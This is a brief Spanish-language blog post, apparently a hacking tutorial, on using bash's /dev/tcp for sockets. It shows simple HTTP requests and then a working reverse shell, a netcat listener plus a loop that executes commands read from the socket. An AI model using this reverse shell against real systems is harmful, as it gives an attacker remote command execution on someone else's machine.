hacktracking: # Sockets con bash

Introducción

/dev

Ejecución

Petición http sin esperar respuesta

# echo "get /" > /dev/tcp/www.google.com/80

Petición y respuesta http

# exec 3<>/dev/tcp/www.google.com/80
# echo "get /" >&3
# cat <&3
# exec 3>&-

Enviar una shell inversa desde local a remoto

remoto# nc -v -l 192.168.0.10 1234
local# exec 4<>/dev/tcp/192.168.0.10/1234
local# cat <&4 | while read line; do $line 2>&4 >&4; done
remoto#
>hostname
>local

# Sockets con bash

No comments: